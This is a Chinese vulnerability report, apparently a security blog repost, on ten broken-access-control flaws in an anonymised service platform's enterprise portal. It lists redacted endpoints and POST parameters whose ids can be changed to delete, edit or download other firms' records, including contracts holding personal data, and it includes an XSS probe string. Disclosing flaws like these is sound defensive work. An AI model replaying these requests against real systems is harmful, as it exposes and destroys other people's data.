某服务公共平台企业登录存在多处全局越权

admin
admin
admin
138858
文章
114
评论
2020年10月5日11:30:50评论280 views字数 1945阅读6分29秒阅读模式

点击蓝字 ·  关注我们

01

漏洞标题

某服务公共平台企业登录存在多处全局越权

02

漏洞类型

越权漏洞

03

漏洞等级

高危

04

漏洞地址

http://xxxx.com/er.app.xxx/apps.html

05

漏洞详情


0x01

注册企业账号 ceshiaaa /ceshi123
注册家政账户后,登录


某服务公共平台企业登录存在多处全局越权



0x02

越权一:基本资料-奖惩信息-越权删除时遍历ids参数即可删除所有公司下的奖惩信息
http://xxxx.com/er.xxxx.jxxx/rest/mng/xx/area
POST数据:ids=100&orgId=1284  


某服务公共平台企业登录存在多处全局越权



0x03

越权二:基本资料-奖惩信息-越权修改时遍历cId参数即可修改所有公司下的奖惩信息
http://xxxx.com/er.app.x'x'xgxxxrea/0/org/updat
POST数据:
cOrgId=1284&cId=101&title=XSS%22%3E%3Cimg+src%3D1%3E%3C%22&type=0&content=werwer%22%3E%3Cimg+src%3D1%3E%3C%22wer&getDate=2020-7-6&serialNo=&cause=&
gist=&result=&note=fwerwerw%22%3E%3Cimg+src%3D1%3E%3C%22


某服务公共平台企业登录存在多处全局越权



0x04

越权三:基本资料-企业宣传视频-越权删除时遍历ids参数即可修改所有公司下的视频信息
http://xxx.com/er.app.xxx/rest/mng/org/videoRest/del
POST数据:ids=21&orgId=1284


某服务公共平台企业登录存在多处全局越权


同理,添加视频也存在越权操作,这里就不列举了


0x05

越权四:基本资料-企业宣传图片-越权删除时遍历delHCer后面的参数即可删除所有公司下的图片信息
http://xxxcom/er.app.xxx/rest/mng/org/orgPictureRestc=1595457273593&orgId=1284&pageNum=1


某服务公共平台企业登录存在多处全局越权



0x06

越权五:服务记录管理-下载附件时遍历id参数即可下载所有用户的附件信息
http://xxx.com/er.app.xx/rest/mng/org/service_record/0/download?id=537
附件是合同,包含用户的全部个人信息。

某服务公共平台企业登录存在多处全局越权


某服务公共平台企业登录存在多处全局越权

http://xxx.com/er.app.xxx/rest/mng/org/service_record/0/download?id=137


某服务公共平台企业登录存在多处全局越权


http://xxx.com/er.app.xxx/rest/mng/org/service_record/0/download?id=217


某服务公共平台企业登录存在多处全局越权



0x08

越权六:科目管理-查看科目时遍历id参数即可查看所有公司下的科目信息
http://xxxx.com/er.app.xxx/rest/mng/org/subjectRest/getById?c=1595459479617&orgId=1284&id=201


某服务公共平台企业登录存在多处全局越权


某服务公共平台企业登录存在多处全局越权


某服务公共平台企业登录存在多处全局越权


0x09

越权七:培训课程管理-课程信息/授课考试/培训学员/科目等功能时添加和删除处通过遍历参数都存在越权
http://xxx.com/er.app.xxx/rest/mng/org/training_course/category/404/member/del
POST数据:ids=2585&orgId=1284&courseId=657

某服务公共平台企业登录存在多处全局越权



0x10

越权八:黑名单-人员信息查看处通过遍历id参数越权查看所有黑名单用户
http://xxx.com/er.app.xx/rest/mng/org/blackList/getBlackListById?id=51&c=1595459937488


某服务公共平台企业登录存在多处全局越权




0x11

越权九:黑名单-黑名单证据-证据查看处通过遍历id参数越权查看所有黑名单证据
http://xxx.com/er.app.xx/rest/mng/org/crimeEvidence/getHCertificate?c=1595460068418&id=18&orgId=1284&pageNum=1


某服务公共平台企业登录存在多处全局越权



0x12

越权十:黑名单-黑名单证据-证据删除处通过遍历id参数越权删除所有用户的黑名单证据
http://xx.com/er.xx/rest/mng/org/crimeEvidence/delHc=1595460318186&id=58&orgId=1284&pageNum=1


某服务公共平台企业登录存在多处全局越权

06

漏洞危害

越权漏洞可以直接越权操作别人的的信息,危害还是比较广泛的

07

建议措施

做好权限的控制,建议添加token


PS:本文仅用于技术讨论与分析,严禁用于任何非法用途,违者后果自负


EDI安全

某服务公共平台企业登录存在多处全局越权

扫二维码|关注我们

一个专注渗透实战经验分享的公众号



免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉。
  • 左青龙
  • 微信扫一扫
  • weinxin
  • 右白虎
  • 微信扫一扫
  • weinxin
admin
  • 本文由 发表于 2020年10月5日11:30:50
  • 转载请保留本文链接(CN-SEC中文网:感谢原作者辛苦付出):
                   某服务公共平台企业登录存在多处全局越权https://cn-sec.com/archives/149987.html
                  免责声明:文章中涉及的程序(方法)可能带有攻击性,仅供安全研究与教学之用,读者将其信息做其他用途,由读者承担全部法律及连带责任,本站不承担任何法律及连带责任;如有问题可邮件联系(建议使用企业邮箱或有效邮箱,避免邮件被拦截,联系方式见首页),望知悉.

发表评论

匿名网友 填写信息